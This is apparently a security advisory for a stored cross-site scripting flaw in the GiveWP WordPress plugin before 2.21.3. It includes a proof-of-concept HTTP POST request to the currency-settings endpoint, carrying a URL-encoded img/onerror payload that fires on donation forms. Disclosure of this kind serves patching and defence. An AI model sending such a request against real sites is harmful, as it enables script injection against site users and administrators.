GiveWP < 2.21.3 - Admin+ Stored Cross-Site Scripting

The plugin does not properly sanitise and escape the currency settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks when the unfiltered_html capability is disallowed (for example in multisite setup)

PoC

Get a REST nonce (logged in as admin): https://example.com/wp-admin/admin-ajax.php?action=rest-nonce POST /?rest_route=/give-api/v2/onboarding/settings/currency HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 149 Connection: close Cookie: [admin+] _wpnonce=fdde54ee91&value;=%22%5c%75%30%30%32%32%5c%75%30%30%33%63%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e%22 The XSS will be triggered when editing/viewing/previewing any Donations forms